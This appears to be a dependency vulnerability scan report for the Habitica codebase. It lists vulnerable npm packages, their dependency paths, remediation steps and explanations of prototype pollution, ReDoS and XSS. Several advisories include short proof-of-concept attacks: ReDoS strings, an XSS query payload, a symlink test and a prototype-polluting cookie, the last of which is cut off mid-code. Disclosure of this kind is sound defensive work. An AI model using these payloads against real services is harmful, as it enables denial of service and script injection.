Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
Overview
Affected versions of this package are vulnerable to Prototype Pollution via the unset function in index.js, because it allows access to object prototype properties.
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
- Unsafe Object recursive merge
- Property definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty(), the condition that checks if the property exists and is an object on both the target and the source passes, and the merge recurses with the target being the prototype of Object and the source being the attacker-defined object. Properties are then copied onto the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
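The high-level merge model above can be made concrete with a short, deliberately unsafe implementation (illustrative only, not taken from any of the libraries named):

```javascript
// Deliberately unsafe recursive merge, matching the high-level model above.
function merge(target, source) {
  for (const key of Object.keys(source)) {
    if (typeof target[key] === 'object' && typeof source[key] === 'object') {
      merge(target[key], source[key]); // for "__proto__" this recurses into Object.prototype
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// JSON.parse produces an own "__proto__" property, so the merge walks into it.
const payload = JSON.parse('{"__proto__": {"polluted": true}}');
merge({}, payload);

const victim = {};
const wasPolluted = victim.polluted === true; // inherited from Object.prototype
delete Object.prototype.polluted;             // undo the pollution before continuing

console.log(wasPolluted); // true
```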
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
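A minimal sketch of such a vulnerable helper, following the theFunction(object, path, value) signature described above (setByPath is hypothetical, not a real library function):

```javascript
// Hypothetical vulnerable path-setter: walks the path segment by segment.
function setByPath(object, path, value) {
  const keys = path.split('.');
  let current = object;
  for (let i = 0; i < keys.length - 1; i += 1) {
    if (typeof current[keys[i]] !== 'object' || current[keys[i]] === null) {
      current[keys[i]] = {};
    }
    current = current[keys[i]]; // for "__proto__" this steps onto Object.prototype
  }
  current[keys[keys.length - 1]] = value;
}

setByPath({}, '__proto__.myValue', 'polluted');

const wasPolluted = {}.myValue === 'polluted'; // inherited by every plain object
delete Object.prototype.myValue;               // undo the pollution

console.log(wasPolluted); // true
```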
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
- Freeze the prototype: use Object.freeze(Object.prototype).
- Require schema validation of JSON input.
- Avoid using unsafe recursive merge functions.
- Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
- As a best practice, use Map instead of Object.
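The null-prototype suggestion can be sketched as follows: an object with no prototype has no inherited __proto__ setter, so a hostile "__proto__" key simply becomes a harmless own property:

```javascript
// Objects created with a null prototype break the prototype chain,
// so assigning "__proto__" cannot reach Object.prototype.
const safe = Object.create(null);
safe['__proto__'] = { polluted: true }; // plain own data property

console.log(safe['__proto__'].polluted); // true, but only on this object
console.log({}.polluted);                // undefined: Object.prototype untouched
```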
For more information on this vulnerability type:
Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade unset-value to version 2.0.1 or higher.
References
high severity
- Vulnerable module: useragent
- Introduced through: useragent@2.3.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › useragent@2.3.0
Overview
useragent allows you to parse user agent strings with high accuracy by using hand-tuned, dedicated regular expressions for browser matching.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when passing long user-agent strings.
This is due to an incomplete fix for this vulnerability: https://snyk.io/vuln/SNYK-JS-USERAGENT-11000.
An attempted fix has been pushed to the master branch.
Details
The ReDoS mechanics behind this class of vulnerability, including a worked example of catastrophic backtracking, are described in the Details section of the semver-regex advisory above.
Remediation
A fix was pushed into the master branch but not yet published.
References
high severity
- Vulnerable module: xml-crypto
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1
Overview
xml-crypto is an XML digital signature and encryption library for Node.js.
Affected versions of this package are vulnerable to Signature Validation Bypass. An attacker with knowledge of only the RSA public key can inject an HMAC-SHA1 signature that passes validation, allowing signature validation to be bypassed.
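The underlying defence, rejecting unexpected signature algorithms before verifying anything, can be sketched independently of xml-crypto's API (the helper and allow-list below are hypothetical; the algorithm URIs are the standard XML-DSig identifiers):

```javascript
// Hypothetical pre-check (not the xml-crypto API): refuse any signature whose
// declared algorithm is not on an explicit allow-list before verifying it.
const ALLOWED_SIGNATURE_ALGORITHMS = new Set([
  'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256',
]);

function assertAllowedAlgorithm(algorithmUri) {
  if (!ALLOWED_SIGNATURE_ALGORITHMS.has(algorithmUri)) {
    throw new Error('Disallowed signature algorithm: ' + algorithmUri);
  }
}

// An HMAC algorithm presented where an RSA signature is expected is rejected.
assertAllowedAlgorithm('http://www.w3.org/2001/04/xmldsig-more#rsa-sha256'); // ok
try {
  assertAllowedAlgorithm('http://www.w3.org/2000/09/xmldsig#hmac-sha1');
} catch (err) {
  console.log(err.message);
}
```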
Remediation
Upgrade xml-crypto to version 2.0.0 or higher.
References
high severity
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4
Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) because the X-XSRF-TOKEN header, built from the secret XSRF-TOKEN cookie value, is inserted into requests to any server whenever the XSRF-TOKEN cookie is available and the withCredentials setting is turned on. If a malicious user manages to obtain this value, it can potentially lead to a bypass of the XSRF defence mechanism.
Workaround
Users should change the default XSRF-TOKEN cookie name in the Axios configuration and manually include the corresponding header only in the specific places where it's necessary.
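A sketch of that workaround using axios's xsrfCookieName and xsrfHeaderName config options, assuming axios is installed; the cookie and header names shown are hypothetical app-specific choices:

```javascript
const axios = require('axios');

// Use a non-default cookie name so the well-known XSRF-TOKEN cookie is never
// auto-forwarded, and keep withCredentials off except where actually needed.
const client = axios.create({
  xsrfCookieName: 'APP-XSRF-TOKEN',   // hypothetical app-specific name
  xsrfHeaderName: 'X-APP-XSRF-TOKEN', // hypothetical matching header
  withCredentials: false,             // enable per-request only where required
});
```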
Remediation
Upgrade axios to version 0.28.0, 1.6.0 or higher.
References
high severity
- Module: eslint-config-habitrpg
- Introduced through: eslint-config-habitrpg@6.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-config-habitrpg@6.2.3
GPL-3.0 license
high severity
- Module: habitica-markdown
- Introduced through: habitica-markdown@4.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › habitica-markdown@4.1.0
GPL-3.0 license
medium severity
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4
Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › node-gcm@1.1.4 › axios@1.6.8
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › winston-loggly-bulk@3.3.3 › node-loggly-bulk@4.0.2 › axios@1.7.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the data: URL handler. An attacker can trigger a denial of service by crafting a data: URL with an excessive payload, causing allocation of memory for content decoding before verifying content size limits.
Remediation
Upgrade axios to version 0.30.0, 1.12.0 or higher.
References
medium severity
- Vulnerable module: markdown-it
- Introduced through: habitica-markdown@4.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › habitica-markdown@4.1.0 › markdown-it-linkify-images@3.0.0 › markdown-it@13.0.2
Overview
markdown-it is a modern pluggable markdown parser.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition.
PoC
import markdownit from 'markdown-it';

const md = markdownit({ linkify: true });

for (let i = 1; i <= 50; i++) {
  const time = Date.now();
  const attack_str = 'https://test.com?' + '*'.repeat(10000 * i) + 'a';
  md.render(attack_str);
  const time_cost = Date.now() - time;
  console.log('attack_str.length: ' + attack_str.length + ': ' + time_cost + ' ms');
}
Details
The ReDoS mechanics behind this class of vulnerability, including a worked example of catastrophic backtracking, are described in the Details section of the semver-regex advisory above.
Remediation
Upgrade markdown-it to version 14.1.1 or higher.
References
medium severity
- Vulnerable module: useragent
- Introduced through: useragent@2.3.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › useragent@2.3.0
Overview
useragent is a library that allows you to parse user agent strings with high accuracy by using hand-tuned, dedicated regular expressions for browser matching.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of insecure regular expressions in the regexps.js component.
PoC
var useragent = require('useragent');
var attackString = "HbbTV/1.1.1CE-HTML/1.9;THOM " + new Array(20).join("SW-Version/");
// A copy of the regular expression
var reg = /(HbbTV)\/1\.1\.1.*CE-HTML\/1\.\d;(Vendor\/)*(THOM[^;]*?)[;\s](?:.*SW-Version\/.*)*(LF[^;]+);?/;
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + attackString + '\r\n\r\n';
console.log(useragent.parse(request).device);
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
- A: The string must start with the letter 'A'.
- (B|C+)+: The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the inner + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
- D: Finally, we ensure this section of the string ends with a 'D'.
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
Testing the valid 30-character string takes around 52ms. But when given an invalid string, the test takes nearly two seconds to complete, roughly 35 times as long as the valid case. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C
The engine has to try each of those combinations to see whether any of them match the expression. When you combine that with the other steps the engine must take, the RegEx101 debugger shows that the engine needs a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause the regex engine to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behavior and cause the service to consume CPU excessively, resulting in a Denial of Service.
Remediation
There is no fixed version for useragent.
References
medium severity
- Vulnerable module: tmp
- Introduced through: useragent@2.3.0 and eslint-config-habitrpg@6.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › useragent@2.3.0 › tmp@0.0.33
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-config-habitrpg@6.2.3 › eslint@6.8.0 › inquirer@7.3.3 › external-editor@3.1.0 › tmp@0.0.33
Overview
Affected versions of this package are vulnerable to Symlink Attack via the dir parameter. An attacker can cause files or directories to be written to arbitrary locations by supplying a crafted symbolic link that resolves outside the intended temporary directory.
PoC
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
Remediation
Upgrade tmp to version 0.2.4 or higher.
References
medium severity
- Vulnerable module: express-validator
- Introduced through: express-validator@5.3.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › express-validator@5.3.1
Remediation: Upgrade to express-validator@6.0.0.
Overview
express-validator is an express.js middleware for validator.js.
Affected versions of this package are vulnerable to Filter Bypass. express-validator by default does not sanitize arrays or non-string values. This vulnerability could be leveraged by an attacker to bypass express-validator protections and inject malicious JavaScript into a webpage.
PoC
const express = require("express");
const app = express();
const { sanitizeQuery } = require("express-validator/filter");
app.get(
"/",
[sanitizeQuery("id").escape()],
async (req, res) => {
res.send("id is " + req.query.id);
}
);
app.listen(8080, function() {
console.log("server running on 8080");
}); //the server object listens on port 8080
Sending an HTTP request such as http://URL:8080/?id[]=<script>alert('XSS')</script> will result in execution of JavaScript successfully bypassing the module.
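A generic pre-sanitization step can close this gap by coercing non-string values to strings before any escaping runs. This is an application-side sketch, not express-validator API; coerceToString is a hypothetical helper:

```javascript
// Hypothetical helper: flatten array- and object-valued query parameters so
// that string sanitizers (like escape()) actually see a string.
function coerceToString(value) {
  if (Array.isArray(value)) return value.map(String).join(',');
  if (value === null || typeof value === 'object') return JSON.stringify(value);
  return String(value);
}

// `?id[]=<script>...` reaches the handler as an array; coerce it first,
// then run the usual string escaping over the result.
console.log(coerceToString(["<script>alert('XSS')</script>"]));
console.log(coerceToString('plain')); // plain
```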
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, the < character can be encoded as &lt; and the > character as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself they are used for HTML tags. If malicious content is injected into an application that escapes special characters, and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they've been correctly escaped in the application code, and in this way the attempted attack is diverted.
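A minimal sketch of the escaping idea described above (illustrative only, not a production sanitizer):

```javascript
// Replace each HTML-significant character with its entity in one pass,
// so no character is escaped twice.
function escapeHtml(s) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => entities[c]);
}

console.log(escapeHtml('<script>alert(1)</script>'));
// &lt;script&gt;alert(1)&lt;/script&gt;
```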
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | Client | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
- Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade express-validator to version 6.0.0 or higher.
References
medium severity
- Vulnerable module: request
- Introduced through: amazon-payments@0.2.9, gulp.spritesmith@6.13.1 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amazon-payments@0.2.9 › request@2.88.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp.spritesmith@6.13.1 › spritesmith@3.5.1 › pixelsmith@2.6.0 › get-pixels@3.3.3 › request@2.88.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › request@2.88.0
Overview
request is a simplified http request client.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to insufficient checks in the lib/redirect.js file, which allows insecure redirects in the default configuration via an attacker-controlled server that performs a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: request package has been deprecated, so a fix is not expected. See https://github.com/request/request/issues/3142.
Remediation
A fix was pushed into the master branch but not yet published.
References
medium severity
- Vulnerable module: tough-cookie
- Introduced through: amazon-payments@0.2.9, gulp.spritesmith@6.13.1 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amazon-payments@0.2.9 › request@2.88.2 › tough-cookie@2.5.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp.spritesmith@6.13.1 › spritesmith@3.5.1 › pixelsmith@2.6.0 › get-pixels@3.3.3 › request@2.88.2 › tough-cookie@2.5.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › request@2.88.0 › tough-cookie@2.4.3
Overview
tough-cookie is a RFC6265 Cookies and CookieJar module for Node.js.
Affected versions of this package are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. Due to an issue with the manner in which the objects are initialized, an attacker can expose or modify a limited amount of property information on those objects. There is no impact to availability.
PoC
// PoC.js
async function main(){
var tough = require("tough-cookie");
var cookiejar = new tough.CookieJar(undefined,{rejectPublicSuffixes:false});
// Exploit cookie
await cookiejar.setCookie(
"Slonser=polluted; Domain=__proto__; Path=/notauth",
"https://__proto__/admin"
);
// normal cookie
var cookie = await cookiejar.setCookie(
